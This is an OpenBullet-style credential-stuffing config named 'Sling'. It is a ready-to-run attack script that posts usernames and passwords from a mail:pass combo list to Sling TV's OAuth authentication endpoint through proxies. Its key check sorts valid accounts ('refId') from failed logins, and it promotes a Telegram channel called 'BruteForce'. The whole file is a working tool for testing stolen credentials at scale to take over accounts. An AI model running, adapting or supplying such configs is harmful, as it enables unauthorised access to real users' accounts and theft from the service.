[SETTINGS]
{
  "Name": "Sling",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-09-14T00:13:04.1469188+04:30",
  "AdditionalInfo": "Telegram Channel: T.me/BruteForce | Need USA Proxy | No Capture",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Post REQUEST POST "https://ms.p.sling.com/sling-api/oauth-helper/alpha/authenticate" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"clientId\":\"ott_agentless_idp_client\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,fa;q=0.8" 
  HEADER "cache-control: no-cache" 
  HEADER "content-length: 102" 
  HEADER "rigin: https://auth-client.p.sling.com" 
  HEADER "pragma: no-cache" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "refId" 
  KEYCHAIN Failure OR 
    KEY "Invalid User Credentials" 

#CC FUNCTION Constant " T.me/BruteForce " -> CAP "Telegram Channel:" 